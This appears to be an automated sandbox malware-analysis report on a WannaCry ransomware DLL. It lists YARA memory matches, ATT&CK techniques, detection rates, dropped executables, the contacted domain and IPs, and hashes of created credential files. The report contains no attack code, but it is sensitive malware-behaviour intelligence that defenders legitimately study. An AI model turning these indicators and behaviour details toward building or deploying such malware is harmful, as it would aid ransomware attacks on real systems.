Source: Yara match	File source: 00000022.00000000.1573456651.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2720028033.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1546866705.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.1483800032.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2718814793.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mssecsvc.exe PID: 4432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: winlogon.exe PID: 556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mssecsvc.exe PID: 5568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 5628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mssecsvc.exe PID: 1196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dwm.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2020, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Native API	1 DLL Side-Loading	612 Process Injection	221 Masquerading	OS Credential Dumping	1 Network Share Discovery	Remote Services	1 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Modify Registry	LSASS Memory	11 System Time Discovery	Remote Desktop Protocol	Data from Removable Media	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	351 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	612 Process Injection	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Install Root Certificate	LSA Secrets	3 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Rundll32	Cached Domain Credentials	124 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
GeW4GzT8G8.dll	95%	ReversingLabs	Win32.Ransomware.WannaCry
GeW4GzT8G8.dll	76%	Virustotal		Browse
GeW4GzT8G8.dll	100%	Avira	W32/Virut.Gen
GeW4GzT8G8.dll	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\tasksche.exe	100%	Avira	TR/AD.WannaCry.sewvt
C:\Windows\mssecsvc.exe	100%	Avira	W32/Virut.Gen
C:\Windows\tasksche.exe	100%	Joe Sandbox ML
C:\Windows\mssecsvc.exe	100%	Joe Sandbox ML
C:\Windows\mssecsvc.exe	96%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Windows\tasksche.exe	100%	ReversingLabs	Win32.Ransomware.WannaCry

Source	Detection	Scanner	Label
https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3	0%	Avira URL Cloud	safe
https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd	0%	Avira URL Cloud	safe
https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8	0%	Avira URL Cloud	safe
http://ocsp.digice	0%	Avira URL Cloud	safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com0	0%	Avira URL Cloud	safe
https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	104.16.166.228	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/R	mssecsvc.exe, 00000006.00000002.1710923691.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.office.com/	WebCacheV01.dat.14.dr	false		high
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO	WebCacheV01.dat.14.dr	false		high
https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3	WebCacheV01.dat.14.dr	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com0	mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000011.00000002.2280369063.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com/shell	svchost.exe, 00000009.00000002.2774950845.00000138EDB2D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1487880092.00000138EDB2D000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aefd.nelreports.net/api/report?cat=bingth	WebCacheV01.dat.14.dr	false		high
https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59	WebCacheV01.dat.14.dr	false		high
https://aefd.nelreports.net/api/report?cat=wsb	WebCacheV01.dat.14.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aefd.nelreports.net/api/report?cat=bingaotak	WebCacheV01.dat.14.dr	false		high
https://deff.nelreports.net/api/report?cat=msn	dllhost.exe, 0000000E.00000003.1497676940.00000184B1519000.00000004.00000800.00020000.00000000.sdmp, WebCacheV01.dat.14.dr, V01.log.14.dr	false		high
http://schemas.micro	svchost.exe, 0000001A.00000002.2755459692.000001486A5B0000.00000002.00000001.00040000.00000000.sdmp	false		high
http://ocsp.digice	dllhost.exe, 0000000E.00000003.1497676940.00000184B1510000.00000004.00000800.00020000.00000000.sdmp, V01.log.14.dr	false	Avira URL Cloud: safe	unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	mssecsvc.exe.4.dr	false		high
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1473328651.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2747533073.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn	WebCacheV01.dat.14.dr	false		high
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aefd.nelreports.net/api/report?cat=bingaot	WebCacheV01.dat.14.dr	false		high
https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717	WebCacheV01.dat.14.dr	false	Avira URL Cloud: safe	unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/(	mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/)	mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat	WebCacheV01.dat.14.dr	false		high
http://schemas.xmlsoap.org/wsdl/	lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/hL	mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269	WebCacheV01.dat.14.dr	false		high
https://windows.msn.cn/shellRESP	svchost.exe, 00000009.00000002.2774950845.00000138EDB2D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1487880092.00000138EDB2D000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	WebCacheV01.dat.14.dr	false		high
https://www.kryptoslogic.com	mssecsvc.exe, 00000006.00000002.1710923691.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd	WebCacheV01.dat.14.dr	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingrms	WebCacheV01.dat.14.dr	false		high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/a	mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8	WebCacheV01.dat.14.dr	false	Avira URL Cloud: safe	unknown
http://Passport.NET/tb	Microsoft-Windows-LiveId%4Operational.evtx.27.dr	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 00000008.00000000.1473328651.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2747533073.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer	mssecsvc.exe, 00000006.00000002.1710923691.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ	mssecsvc.exe, 00000006.00000002.1709689615.000000000019D000.00000004.00000010.00020000.00000000.sdmp, mssecsvc.exe, 0000000C.00000002.1693037455.000000000019C000.00000004.00000010.00020000.00000000.sdmp, mssecsvc.exe, 00000011.00000002.2279550385.000000000019D000.00000004.00000010.00020000.00000000.sdmp	false		high
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&	WebCacheV01.dat.14.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
209.207.4.1	unknown	United States	19108	SUDDENLINK-COMMUNICATIONSUS	false
88.63.225.1	unknown	Italy	3269	ASN-IBSNAZIT	false
176.122.86.146	unknown	Kazakhstan	59443	BAYNUR-ASKZ	false
198.232.135.223	unknown	United States	292	ESNET-WESTUS	false
91.57.194.1	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
51.20.135.12	unknown	United States	2686	ATGS-MMD-ASUS	false
46.252.194.170	unknown	Germany	21501	GODADDY-AMSDE	false
8.188.251.1	unknown	Singapore	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
122.230.196.1	unknown	China	134771	CHINATELECOM-ZHEJIANG-WENZHOU-IDCWENZHOUZHEJIANGProvince	false
8.188.251.4	unknown	Singapore	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
91.57.194.122	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
69.111.126.153	unknown	United States	7018	ATT-INTERNET4US	false
9.166.247.19	unknown	United States	3356	LEVEL3US	false
75.165.172.1	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
75.165.172.2	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
122.230.196.134	unknown	China	134771	CHINATELECOM-ZHEJIANG-WENZHOU-IDCWENZHOUZHEJIANGProvince	false
51.20.135.1	unknown	United States	2686	ATGS-MMD-ASUS	false
201.202.46.2	unknown	Costa Rica	11830	InstitutoCostarricensedeElectricidadyTelecomCR	false

Private

IP
192.168.2.148
192.168.2.149
192.168.2.146
192.168.2.147
192.168.2.140
192.168.2.141
192.168.2.144
192.168.2.145
192.168.2.142
192.168.2.143
192.168.2.159
192.168.2.157
192.168.2.158
192.168.2.151
192.168.2.152
192.168.2.150
192.168.2.155
192.168.2.156
192.168.2.153
192.168.2.154
192.168.2.126
192.168.2.247
192.168.2.127
192.168.2.248
192.168.2.124
192.168.2.245
192.168.2.125
192.168.2.246
192.168.2.128
192.168.2.249
192.168.2.129
192.168.2.240
192.168.2.122
192.168.2.243
192.168.2.123
192.168.2.244
192.168.2.120
192.168.2.241
192.168.2.121
192.168.2.242
192.168.2.97
192.168.2.137
192.168.2.96
192.168.2.138
192.168.2.99
192.168.2.135
192.168.2.98
192.168.2.136
192.168.2.139
192.168.2.250
192.168.2.130
192.168.2.251
192.168.2.91
192.168.2.90
192.168.2.93
192.168.2.133
192.168.2.254
192.168.2.92
192.168.2.134
192.168.2.95
192.168.2.131
192.168.2.252
192.168.2.94
192.168.2.132
192.168.2.253
192.168.2.104
192.168.2.225
192.168.2.105
192.168.2.226
192.168.2.102
192.168.2.223
192.168.2.103
192.168.2.224
192.168.2.108
192.168.2.229
192.168.2.109
192.168.2.106
192.168.2.227
192.168.2.107
192.168.2.228
192.168.2.100
192.168.2.221

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592021
Start date and time:	2025-01-15 16:56:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	31
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	GeW4GzT8G8.dll renamed because original name is a hash value
Original Sample Name:	78bd8b9c610315d7247e2076bbd9458c.dll
Detection:	MAL
Classification:	mal100.rans.troj.expl.evad.winDLL@18/72@2/100
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .dll

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 2.22.50.144, 2.23.77.188, 217.20.57.35, 20.109.210.53, 40.126.32.134, 104.208.16.94, 13.107.246.45
Excluded domains from analysis (whitelisted): aioade.com, dccqyp.com, lietra.com, uzgscj.com, fjlfoj.com, pqrkoe.com, qxkaoo.com, ufpirp.com, eicsxp.com, izacru.com, csyyvl.com, tytzka.com, xfqora.com, vdxosv.com, favteu.com, ubumrx.com, dwyvvs.com, efegei.com, ojnqpy.com, ljomqy.com, bitcaa.com, eafaww.com, xmkske.com, epejsq.com, riyymn.com, lnsrfu.com, xwowqk.com, uxwoff.com, rxtiio.com, bnnjpj.com, pvjita.com, qfqayo.com, nihrqy.com, iieiay.com, uxuxpl.com, korubi.com, hsvhuy.com, uxumpp.com, kyfjqk.com, wiybwa.com, veuibo.com, ryiyek.com, aguuxw.com, qxvfaq.com, ueohif.com, fofavv.com, bzmigs.com, ofulyt.com, yjumyc.com, sxsxzp.com, xuuvfo.com, jseegc.com, oljrbm.com, izgyem.com, qycyhq.com, loauaa.com, izyqkd.com, vgkebm.com, icvsob.com, jbkunk.com, sgucuw.com, yuaame.com, vdxuni.com, imjmns.com, whmeca.com, ylotge.com, uuruou.com, orvwjv.com, vwfafe.com, euieic.com, scbors.com, odogwa.com, otelrules.azureedge.net, ant.trenz.pl, mhmasr.com, oloroz.com, eahdry.com, yazpuo.com, fe3cr.delivery.mp.microsoft
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:57:14	API Interceptor	1x Sleep call for process: dllhost.exe modified
10:57:14	API Interceptor	1x Sleep call for process: loaddll32.exe modified
10:58:02	API Interceptor	112x Sleep call for process: mssecsvc.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	JRTn7b1kHg.dll	Get hash	malicious	Wannacry	Browse	104.16.166.228
	alN48K3xcD.dll	Get hash	malicious	Wannacry	Browse	104.16.167.228
	NZZ71x6Cyz.dll	Get hash	malicious	Wannacry	Browse	104.16.167.228
	bC61G18iPf.dll	Get hash	malicious	Wannacry	Browse	104.16.167.228
	XB6SkLK7Al.dll	Get hash	malicious	Wannacry	Browse	104.16.167.228
	ue5QSYCBPt.dll	Get hash	malicious	Wannacry	Browse	104.16.167.228
	xjljKPlxqO.dll	Get hash	malicious	Wannacry	Browse	104.16.167.228
	wmnq39xe8J.dll	Get hash	malicious	Wannacry	Browse	104.16.167.228
	FAuEwllF3K.dll	Get hash	malicious	Wannacry	Browse	104.16.167.228
	6fRzgDuqWT.dll	Get hash	malicious	Wannacry	Browse	104.16.167.228

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ESNET-WESTUS	xd.arm.elf	Get hash	malicious	Mirai	Browse	198.130.12.18
	miori.mips.elf	Get hash	malicious	Unknown	Browse	198.230.94.67
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	198.198.139.235
	Fantazy.spc.elf	Get hash	malicious	Unknown	Browse	198.232.208.252
	splspc.elf	Get hash	malicious	Unknown	Browse	198.137.125.163
	arm7.elf	Get hash	malicious	Unknown	Browse	198.128.208.210
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	198.193.165.226
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	198.230.192.201
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	198.225.7.245
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	198.198.79.137
ASN-IBSNAZIT	bot.arm5.elf	Get hash	malicious	Unknown	Browse	80.117.234.116
	bot.mips.elf	Get hash	malicious	Unknown	Browse	95.245.119.173
	bot.ppc.elf	Get hash	malicious	Unknown	Browse	95.239.40.44
	i686.elf	Get hash	malicious	Mirai	Browse	62.211.75.113
	arm5.elf	Get hash	malicious	Mirai	Browse	5.99.130.226
	i486.elf	Get hash	malicious	Mirai	Browse	88.63.159.198
	xd.mips.elf	Get hash	malicious	Mirai	Browse	87.1.127.203
	xd.x86.elf	Get hash	malicious	Mirai	Browse	94.84.7.125
	sh4.elf	Get hash	malicious	Mirai	Browse	95.246.33.157
	xd.spc.elf	Get hash	malicious	Mirai	Browse	85.32.203.253
BAYNUR-ASKZ	Josho.mpsl.elf	Get hash	malicious	Unknown	Browse	95.182.11.38
	EN36clwqq9.elf	Get hash	malicious	Mirai	Browse	95.182.11.27
	TWHPzbbhtF.elf	Get hash	malicious	Mirai	Browse	95.182.11.35
	05w3hcoTlb.elf	Get hash	malicious	Mirai	Browse	95.182.11.13
	PkQB1rE5kK.elf	Get hash	malicious	Mirai	Browse	95.182.11.41
	GpqAAlRMz4.elf	Get hash	malicious	Moobot	Browse	95.182.11.45
	b3astmode.arm7.elf	Get hash	malicious	Mirai	Browse	95.182.11.16
	wuka9aK727.elf	Get hash	malicious	Mirai	Browse	95.182.11.31
	HKZqB954AC.elf	Get hash	malicious	Mirai	Browse	95.182.11.14
	DUGEn9I0cO.elf	Get hash	malicious	Mirai	Browse	95.182.11.26
SUDDENLINK-COMMUNICATIONSUS	bot.m68k.elf	Get hash	malicious	Unknown	Browse	24.32.186.78
	m68k.elf	Get hash	malicious	Mirai	Browse	75.108.75.213
	6KJ3FjgeLv.dll	Get hash	malicious	Wannacry	Browse	74.197.101.1
	meth1.elf	Get hash	malicious	Mirai	Browse	47.222.230.125
	arm4.elf	Get hash	malicious	Unknown	Browse	173.217.238.165
	6.elf	Get hash	malicious	Unknown	Browse	75.109.54.232
	res.mpsl.elf	Get hash	malicious	Unknown	Browse	47.215.241.41
	armv6l.elf	Get hash	malicious	Unknown	Browse	47.220.169.215
	5.elf	Get hash	malicious	Unknown	Browse	74.225.230.170
	Fantazy.sh4.elf	Get hash	malicious	Unknown	Browse	74.249.51.157

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\tasksche.exe	JRTn7b1kHg.dll	Get hash	malicious	Wannacry	Browse
	S8LDvVdtOk.dll	Get hash	malicious	Wannacry	Browse
	9nNO3SHiV1.dll	Get hash	malicious	Wannacry	Browse
	zbRmQrzaHY.dll	Get hash	malicious	Wannacry	Browse
	zyeX8bTkky.dll	Get hash	malicious	Wannacry	Browse
	qt680eucI4.dll	Get hash	malicious	Wannacry	Browse
	1w3BDu68Sg.dll	Get hash	malicious	Wannacry	Browse
	qCc1a4w5YZ.exe	Get hash	malicious	Wannacry	Browse
	stN592INV6.exe	Get hash	malicious	Wannacry	Browse
	onq54JS79W.exe	Get hash	malicious	Wannacry	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	data
Category:	modified
Size (bytes):	11136
Entropy (8bit):	7.979922100942834
Encrypted:	false
SSDEEP:	192:vn0RVUXNUsDcennrfNpCwAlx5467nB0FBYenIqDF6OZ+7fpiWztEC8lLEbiE7C:qODnhwt3J76/YeIqh6ZzpHzt46iV
MD5:	97FC0449C036FE995D9B6E11A1CB1277
SHA1:	27DFC7B1B1FE1C267B9C39CACAE39E84EF1839AE
SHA-256:	33535D4D4F581D250408F60B7AF376009314AD83AA100367F224DFBEA3302CC8
SHA-512:	546B24C4DBE78AA5DCBC1B08028049FBDA448D9B472444A1B461A4770D93E3E9D89E9179E0BF9E4D0608A6292FA53AE9AE36DE2EE225A60EF1320D99E6E6C0A5
Malicious:	false
Preview:	....t+..................z..O.......}`..>.A..Q..~.8... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ....O.6......34i..C..=.....k\|..3............. ...X:..Y.......;.....Xd...w>.....p..1. De..x.JA.Fs.'....w......C..iMM...L(1.5Vl.Dx,.W...](..C.}^.`.7SE_............e..!N].....94V.X...L3j.js.?7j.+.0..p..X8...0.C........A.K}...J9......k.....&H..6i~....(...E...1s`...W..=.....`.s....]~...~..!<.ir8......S:...B.b:....j.<."C.uk...<4....F].,{+w.......,..\.J..OFB.......C........V.....-..<d}L6c..L..... m.X.v..h.....7....dkiR..,.....KTPt.....7.......G.pP...z.K...i.B.(.\A...\|l.K...B.T.k.......C..8.. {@)/ok..:../...W.. ...\.....Z.)...T....s).]5.\|.(S........8....Y.Z..y..Z.U.-.\..`.>[....._.ll.Y.wqH...q4lH.Z;.....q....T......k.5..2_.. ..O......a.&V.........l.z._X ..W3}.g.Jl.1p..&...:.......\...u(.$.-.......;.....AC..r.......2.P1... ..bC.......1.(..b:&....C...A8.z.....+...85.5hD.....}...9...P...\j:..n..)..a.._..[.....k=F..1&S*........6....

C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
